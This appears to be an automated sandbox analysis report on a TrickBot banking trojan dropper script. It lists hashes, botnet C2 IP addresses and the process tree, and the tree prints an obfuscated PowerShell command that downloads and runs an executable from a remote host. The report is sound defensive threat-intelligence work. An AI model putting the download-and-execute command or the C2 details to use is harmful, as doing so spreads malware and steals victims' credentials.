trickbot | 4bdc0f495dfb6d2425fd712ccdda2d1943c700e3b780c37c1c147462a30c9e30

General

Target

wGGlWA9kvQ.js
Size

30KB
MD5

71e84623c9f780a2ae34c49964a1d4fd
SHA1

8bab366961bf4363c13b169f086c959ff8515e85
SHA256

4bdc0f495dfb6d2425fd712ccdda2d1943c700e3b780c37c1c147462a30c9e30
SHA512

f4cd7ccd1bf213e3262e4268b0247466b31e3bed3b3877a54b24e58d6710b6f1e83dce581d6d88ab544382cd6559fca2955e83657fd7801d0852fd00497327eb

Score

10^/10

trickbot rob35 banker trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://dralex.smartwebsitedesign.com/local.php

Extracted

Family

trickbot

Version

100010

Botnet

rob35

C2

5.34.180.180:443

64.74.160.228:443

198.46.198.116:443

5.34.180.185:443

107.152.46.188:443

195.123.241.214:443

23.254.224.2:443

107.172.188.113:443

200.52.147.93:443

185.198.59.45:443

45.14.226.101:443

185.82.126.38:443

85.204.116.139:443

45.155.173.248:443

103.91.244.50:443

45.230.244.20:443

45.226.124.226:443

187.84.95.6:443

186.250.157.116:443

186.137.85.76:443

Attributes

autorun
Name:pwgrab

ecc_pubkey.base64

Signatures

Trickbot
Developed in 2016, TrickBot is one of the more recent banking Trojans.
trojan banker trickbot
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

12 2820 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

TempNeX26.exe

pid process

2920 TempNeX26.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

2820 powershell.exe
2820 powershell.exe
2820 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2820 powershell.exe

flow	pid	process
12	2820	powershell.exe

pid	process
2920	TempNeX26.exe

pid	process
2820	powershell.exe
2820	powershell.exe
2820	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2820	powershell.exe

Suspicious use of WriteProcessMemory 7 IoCs

Processes:

wscript.execmd.exe

description	pid	process	target process
PID 744 wrote to memory of 2212	744	wscript.exe	cmd.exe
PID 744 wrote to memory of 2212	744	wscript.exe	cmd.exe
PID 2212 wrote to memory of 2820	2212	cmd.exe	powershell.exe
PID 2212 wrote to memory of 2820	2212	cmd.exe	powershell.exe
PID 2212 wrote to memory of 2920	2212	cmd.exe	TempNeX26.exe
PID 2212 wrote to memory of 2920	2212	cmd.exe	TempNeX26.exe
PID 2212 wrote to memory of 2920	2212	cmd.exe	TempNeX26.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\wGGlWA9kvQ.js
1⤵
- Suspicious use of WriteProcessMemory
PID:744

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c pOwEr^shEll -ex^ecution^pol^icy b^ypa^ss -n^oprof^ile -w h^idd^en $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://dralex.smartwebsitedesign.com/local.php','%temp%NeX26.exe'); & %temp%NeX26.exe & toMsRYPvmFupWNT
2⤵
- Suspicious use of WriteProcessMemory
PID:2212

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://dralex.smartwebsitedesign.com/local.php','C:\Users\Admin\AppData\Local\TempNeX26.exe');
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2820

C:\Users\Admin\AppData\Local\TempNeX26.exe
C:\Users\Admin\AppData\Local\TempNeX26.exe
3⤵
- Executes dropped EXE
PID:2920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe
4⤵
PID:3644

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\TempNeX26.exe
MD5
2377e8d85d1c3271e8eeab035f158eca

SHA1
25e7161fe88e96d8f2e53523e36e978ff3c13563

SHA256
dcb300ddb882699c560279dfc67ddb6be50a98bf34fef9e44fd2eb55675baebd

SHA512
34eccf16c4c81673a6033a4627b4606762fad74104e6cd1e9291f0ecc797a87cd14e95c3a3cdc75479f912a5167908b8365dc604bd9ef12c4aa4ff5137ce734c

Download Submit
C:\Users\Admin\AppData\Local\TempNeX26.exe
MD5
2377e8d85d1c3271e8eeab035f158eca

SHA1
25e7161fe88e96d8f2e53523e36e978ff3c13563

SHA256
dcb300ddb882699c560279dfc67ddb6be50a98bf34fef9e44fd2eb55675baebd

SHA512
34eccf16c4c81673a6033a4627b4606762fad74104e6cd1e9291f0ecc797a87cd14e95c3a3cdc75479f912a5167908b8365dc604bd9ef12c4aa4ff5137ce734c

Download Submit
memory/2212-2-0x0000000000000000-mapping.dmp

Download
memory/2820-3-0x0000000000000000-mapping.dmp

Download
memory/2820-4-0x00007FFF6D290000-0x00007FFF6DC7C000-memory.dmp

Filesize
9.9MB

Download
memory/2820-5-0x00000264CF4E0000-0x00000264CF4E1000-memory.dmp

Filesize
4KB

Download
memory/2820-6-0x00000264E9C40000-0x00000264E9C41000-memory.dmp

Filesize
4KB

Download
memory/2920-7-0x0000000000000000-mapping.dmp

Download
memory/3644-10-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads